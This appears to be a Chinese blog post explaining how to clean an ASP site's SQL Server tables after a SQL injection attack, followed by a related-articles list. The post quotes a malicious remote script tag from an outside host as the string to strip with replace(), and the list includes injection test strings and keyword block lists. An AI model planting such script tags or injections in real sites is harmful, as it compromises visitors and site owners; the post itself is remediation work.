asp 网站被 sql 注入后的处理办法。

最新推荐文章于 2021-01-12 08:11:02 发布
最新推荐文章于 2021-01-12 08:11:02 发布
阅读量2.2k 收藏 1
点赞数
分类专栏: Lang.ASP,VBScript DB.SQL Server 文章标签: asp sql types
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/KimSoft/article/details/3831266
版权

1、varchar 类型的直接replace一下就ok了。

 

如:"update [t_information] set publisher=replace(publisher, '<script src=http://cn.daxia123.cn/cn.js></script>', '')"

 

2、text字段,就要麻烦一下(超过8000就要另想办法了)

"update [t_information] set AuthorInfor=replace(cast(AuthorInfor as varchar(8000)) ,'<script src=http://cn.daxia123.cn/cn.js></script>','')"

 

3、有时有特殊符号,如 %,可以用下列的方法处理一下

update [infor_types] set parentid=replace(parentid, char(37), '')

 

关键是要加屏蔽的语句。

KimSoft
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ASP注入原理及手工入侵经过
古剑楠的专栏
08-24 6856
 首先声明几点:一、关于发这篇帖子没有其他的意思,只是想和大家一起学习而已,在学习中提高自己。二、关于郑州某大学,我已经和他们的管理员联系了,告诉了他们网站的这个漏洞,相信他们很快就会补好。入侵不存在任何恶意!!!三、就目前来说,我昨晚试的,还有很多ASP网站存在SQL注入漏洞。所以请不要高非法入侵否则后果自负。四、此篇不是写给高手看的。:)大虾们不要笑我菜。其实我是很菜。好了,最后转贴请注明出处
修复SQL注入漏洞 两种方法
cuanli7032的博客
03-16 2365
之前在网上找到一个在线的网站漏洞扫描工具,叫亿思平台,是一个免费的web安全扫描平台。反正免费,就测试自己的一个网站,没想到还真扫描出SQL注入漏洞。但里面没有提供自动修复功能,需要自己动手来修复。经过反复查看论坛资料,还真让我...
ASP.NET防范SQL注入式攻击的方法
01-02
一、什么是SQL注入式攻击?  SQL注入式攻击就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。在某些表单中,用户输入的内容直接用来构造(或者影响)动态SQL命令,或作为存储过程的输入参数,这类表单特别容易受到SQL注入式攻击。常见的SQL注入式攻击过程类如:    ⑴ 某个ASP.NET Web应用有一个登录页面,这个登录页面控制着用户是否有权访问应用,它要求用户输入一个名称和密码。    ⑵ 登录页面中输入的内容将直接用来构造动态的SQL命令,或者直接用作存储过程的参数。下面是ASP.NET应用构造查询的一个例子:   System
解决ASPSQL注入攻击程序问题
收集盒 Book box
09-10 815
现在比较流行的SQL注入工具的工作方式是通过GET和POST来完成具体的注入。我们可以将注入时所用到的一切符号过滤掉。那么我们可以通过简单的判断语句来达到目的。我们先来过滤GET吧。 代码如下: dim sql_injdata SQL_inj SQL_Get SQL_injdata = "’|and|exec|insert|select|delete|update|count|*|%|chr
ASP.NET SQL 注入解决方案
何足道也
10-17 1025
一个过滤类: /// ///SqlInject 的摘要说明 /// public class SqlInject : System.Web.UI.Page { //检测到注入后的处理方式: 0:仅警告;1:警告+记录;2:警告+自定义错误页面;3:警告+记录+自定义错误页面 private const int _type = 0; private
SQL注入天书 - ASP注入漏洞全接触
热门推荐
Ardor Leo's Blog
10-30 1万+
http://www.cnblogs.com/enif/archive/2004/08/11/32146.html(源址)SQL注入天书 - ASP注入漏洞全接触 作者:NB联盟-小竹 (QQ:48814)引  言随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候
ASP+ACCESS SQL注入漏洞修复代码
caizi001的专栏
05-07 3515
最近发现公司的网站被写入了些代码,应该是被注入入侵了,我们的企业网站是几年前做的,使用的是asp+access做的,现在在网上找到了一些修复漏洞的方法先给两种万能的防注入代码(放置conn.asp中) 第一种: squery=lcase(Request.ServerVariables("QUERY_STRING")) sURL=lcase(Request.ServerVariable
ASP.NET SQL 注入免费解决方案
学习的约束力,提醒自己
02-09 909
 UrlScan的3.1是一个安全的工具,限制了IIS的HTTP请求将处理类型。 <span onmouseover="function onmouseover(){function onmouseover(){_tipon(this)}}" onmouseout="function onmouseout(){function onmouseout(){_t
sql 整改措施 注入_改进的SQL注入(加强抑错)-ASP教程,安全加密
weixin_33609020的博客
01-12 104
asp注入之解决方案特殊页面处理因为有些页通过流式传递(比如含有文件上传的表单)如果单一使用穷举form对象的操作就会出错所以要把这些页面过滤出来,同时在页面中使用sql(“检测的字串”)才行垃圾猪[email protected]://blog.csdn.net/cfaq源码下载http://www.new57.com/softback/sql.rar将本页用include方法放在头部以让所...
ASP SQL注入
星梦小筑
02-26 889
注入表达式类型: 'and 1='1 原理:ASP网站一般采用的SQL语句:strsql="select * from xx where xx='"&value&"'"    加上注入语句再解释到SQL则成为:select * from xx where xx='value' and 1='1'    无疑如果没有过滤注入的话,这会返回正常页面的,但如果改成    select * fro
SQL注入的一个ASP网站源码
12-29
SQL注入的一个ASP网站源码,ASP+ACCESS手动注入环境搭建,用来练手不错!
ASP网站SQL注入方法详解.doc
10-13
ASP网站SQL注入方法详解.doc
asp-sql注入源码
04-17
asp-sql注入源码(存在sql注入asp源代码,供大家学习)
sql注入网站源码
04-09
挺好的带有sql注入漏洞的asp网站源码,可以自行搭建环境。
ASP.NET防止SQL注入的方法示例
01-20
本文实例讲述了ASP.NET防止SQL注入的方法。分享给大家供大家参考,具体如下: 最近接手别人一个项目,发现存在SQL注入漏洞,因为不想改太多代码,所以那种参数法防注入呢我就用不着了。只能用传统的笨一点的办法了。...
asp 防止SQL注入代码
01-20
把下面代码复制到每个文件头部就可以防止SQL注入了,写程序安全最重要 :) <% Dim Fy_Url,Fy_a,Fy_x,Fy_Cs(),Fy_Cl,Fy_Ts,Fy_Zx ‘—定义部份 头—— Fy_Cl = 1 ‘处理方式:1=提示信息,2=转向页面,3=...
asp.net 防止SQL注入攻击
10-29
asp.net网站防止SQL注入攻击,通常的办法是每个文件都修改加入过滤代码,这样很麻烦,下面介绍一种办法,可以从整个网站防止注入
最新ASP通用防SQL注入代码
10-13
这是经过整理和测试的,最新ASP通用防SQL注入代码。 很简洁也很好用.和大家分享.
2023年防sql注入全面过滤 aspsql注入代码大全
最新发布
10-24
在编写 ASP 代码时,我们需要采取一系列措施来防止 SQL 注入攻击。 首先,我们需要对输入数据进行验证和过滤。在接收用户输入之前,可以使用内置的 ASP 函数如`Trim()`,`Replace()`等来去除输入数据中的空格和特殊...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值